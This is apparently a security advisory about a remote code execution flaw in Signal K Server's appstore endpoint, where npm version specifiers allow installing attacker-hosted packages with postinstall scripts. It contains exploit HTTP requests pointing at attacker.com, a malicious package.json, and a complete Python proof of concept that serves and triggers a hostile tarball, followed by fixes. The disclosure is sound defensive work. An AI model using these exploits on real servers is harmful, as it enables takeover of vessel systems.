GHSA-93jc-vqqc-vvvh: Signal K Server Vulnerable to Remote Code Execution via Malicious npm Package

The SignalK appstore interface allows administrators to install npm packages through a REST API endpoint. While the endpoint validates that the package name exists in the npm registry as a known plugin or webapp, the version parameter accepts arbitrary npm version specifiers including URLs. npm supports installing packages from git repositories, GitHub shorthand syntax, and HTTP/HTTPS URLs pointing to tarballs. When npm installs a package, it can automatically execute any postinstall script defined in package.json, enabling arbitrary code execution.

The vulnerability exists because npm’s version specifier syntax is extremely flexible, and the SignalK code passes the version parameter directly to npm without sanitization. An attacker with admin access can install a package from an attacker-controlled source containing a malicious postinstall script.

Affected Code

File: src/interfaces/appstore.js (lines 46-76)

app.post(
  [
    `${SERVERROUTESPREFIX}/appstore/install/:name/:version`,
    `${SERVERROUTESPREFIX}/appstore/install/:org/:name/:version`
  ],
  (req, res) => {
    let name = req.params.name
    const version = req.params.version  // No validation on version format
    
    // ... validation only checks if package name exists ...
    
    installSKModule(name, version)  // Passes unsanitized version to npm
  }
)

File: src/modules.ts (lines 180-205)

if (name) {
  packageString = version ? `${name}@${version}` : name  // Direct concatenation
}

if (process.platform === 'win32') {
  npm = spawn('cmd', ['/c', `npm --save ${command} ${packageString}`], opts)
} else {
  npm = spawn('npm', ['--save', command, packageString], opts)
}

Impact

An attacker with admin credentials (obtained via the authentication bypass chain) can execute arbitrary commands on the server with the privileges of the SignalK process. This enables complete system compromise including data theft, backdoor installation, lateral movement, and denial of service.

A compromised server can inject malicious PGN messages onto the NMEA 2000 bus or forge NMEA 0183 sentences, affecting all connected devices. Attack scenarios include manipulating autopilot systems (Pypilot, Raymarine, Garmin) via the Autopilot API to alter vessel course, spoofing AIS messages to create phantom vessels on radar, altering GPS position data sent to chart plotters and autopilots, injecting false depth sounder readings, manipulating wind instrument data, or sending shutdown commands to electronically controlled engines via NMEA 2000. Many vessels expose SignalK to the internet for remote monitoring, making them globally accessible to attackers.

The vulnerability can be exploited using any of npm’s flexible version specifier formats:

1. Real npm Package with Required Keyword

POST /skServer/appstore/install/malicious-signalk-plugin/1.0.0 HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

Publishing a malicious package to the official npm registry with the signalk-node-server-plugin or signalk-webapp keyword allows us to install arbitrary npm packages using standard semantic versioning format (1.0.0). This is non-stealthy as the package is publicly visible, but can be leveraged to spread malware via npm’s ecosystem, since such a package will show up on the webapp feed and other users might install it.

2. Real npm Package via npm Alias

POST /skServer/appstore/install/signalk-pushover-plugin/npm:malicious-package@1.0.0 HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The npm: prefix allows installing a package under a different name. For example, npm:malicious-package@1.0.0 installs malicious-package but references it as if it were the legitimate signalk-pushover-plugin. This obscures the actual package being installed from casual inspection, making it stealthier while still requiring npm publishing.

3. Package Hosted on GitHub (GitHub Shorthand)

POST /skServer/appstore/install/signalk-pushover-plugin/attacker%2Fmalicious-plugin HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The format username/repo (URL-encoded as attacker%2Fmalicious-plugin) is shorthand for github:username/repo. npm automatically fetches the repository from GitHub, extracts it, and runs npm install. If the repo contains a postinstall script, it executes. The repository must contain a valid package.json with the malicious script.

4. Package Hosted on Attacker-Controlled Git Server (git+ Protocol)

POST /skServer/appstore/install/signalk-pushover-plugin/git%2Bhttps:%2F%2Fattacker.com%2Fmalicious-plugin.git HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The git+https:// or git+ssh:// prefix tells npm to clone a git repository. This works with any git server, not just GitHub. The attacker has full control over the repository contents and can update it at any time. This provides maximum control over the package source without relying on third-party services.

5. Package Hosted on Attacker Webserver as Tarball

POST /skServer/appstore/install/signalk-pushover-plugin/http:%2F%2Fattacker.com%2Fpkg.tgz HTTP/1.1
Host: localhost:3000
Authorization: Bearer <VALID_AUTH_TOKEN>
Content-Length: 0

The http:// or https:// URL pointing to a .tgz file tells npm to download and extract the tarball. This is the most flexible method as it requires no external service dependencies - the attacker controls both the package contents and the hosting infrastructure. No git repository or npm registry account needed.

All methods result in npm executing the postinstall script from the attacker-controlled package. A malicious npm package requires only two files to achieve RCE:

package.json - Defines the package metadata and the malicious script:

{
  "name": "signalk-evil-plugin",
  "version": "1.0.0",
  "keywords": ["signalk-node-server-plugin"],
  "scripts": {
    "postinstall": "node -e \"require('child_process').exec('calc.exe')\""
  }
}

The postinstall script executes automatically after npm installs the package.

index.js - Minimal plugin implementation to avoid errors:

module.exports = function(app) {
  return {
    id: 'evil-plugin',
    name: 'Evil Plugin',
    start: function() {},
    stop: function() {}
  }
}

PoC using the tarball variant of the exploit

import requests
import tarfile
import json
import io
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import quote

TARGET = "http://localhost:3000"
ATTACKER_IP = "localhost"
ATTACKER_PORT = 9999
RCE_COMMAND = "calc.exe"  # Windows; use "id > /tmp/pwned" for Linux
TOKEN = "<VALID_AUTH_TOKEN>"

def create_malicious_tarball():
    package_json = {
        "name": "signalk-evil-plugin",
        "version": "1.0.0",
        "keywords": ["signalk-node-server-plugin"],
        "scripts": {
            "postinstall": f"node -e \"require('child_process').exec('{RCE_COMMAND}')\""
        }
    }
    
    index_js = b"module.exports = function(app) { return { id: 'evil', start: function(){}, stop: function(){} } }"
    
    tar_buffer = io.BytesIO()
    with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar:
        # Add package.json
        pkg_data = json.dumps(package_json, indent=2).encode()
        pkg_info = tarfile.TarInfo(name="package/package.json")
        pkg_info.size = len(pkg_data)
        tar.addfile(pkg_info, io.BytesIO(pkg_data))
        
        # Add index.js
        idx_info = tarfile.TarInfo(name="package/index.js")
        idx_info.size = len(index_js)
        tar.addfile(idx_info, io.BytesIO(index_js))
    
    return tar_buffer.getvalue()

def start_malicious_server(tarball_data):
    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            print(f"[+] Victim fetched malicious package!")
            self.send_response(200)
            self.send_header("Content-Type", "application/gzip")
            self.send_header("Content-Length", len(tarball_data))
            self.end_headers()
            self.wfile.write(tarball_data)
        
        def log_message(self, *args):
            pass
    
    server = HTTPServer(("0.0.0.0", ATTACKER_PORT), Handler)
    thread = threading.Thread(target=server.serve_forever, daemon=True)
    thread.start()
    print(f"[+] Malicious server running on port {ATTACKER_PORT}")
    return server

def trigger_rce(token):
    tarball_url = f"http://{ATTACKER_IP}:{ATTACKER_PORT}/package.tgz"
    encoded_url = quote(tarball_url, safe='')
    
    url = f"{TARGET}/skServer/appstore/install/signalk-pushover-plugin/{encoded_url}"
    
    headers = {"Authorization": f"Bearer {token}"}
    
    print(f"[*] Triggering installation from {tarball_url}")
    r = requests.post(url, headers=headers)
    print(f"[+] Response: {r.status_code} - {r.text}")

if __name__ == "__main__":
    tarball = create_malicious_tarball()
    print(f"[+] Created malicious tarball ({len(tarball)} bytes)")
    
    start_malicious_server(tarball)
    trigger_rce(TOKEN)

Recommendation

1. Restrict package installation to the official npm registry only by validating that version parameters match semver format
2. Use npm’s --ignore-scripts flag to prevent automatic script execution
3. Implement an allowlist of approved packages
4. Consider sandboxing the package installation process

While we understand that allowing 3rd party plugin installation is an intended functionality we believe that more secure practices must be applied to the whole process given the operational importance a SignalK instance can have onboard a vessel and it’s rise in polularity.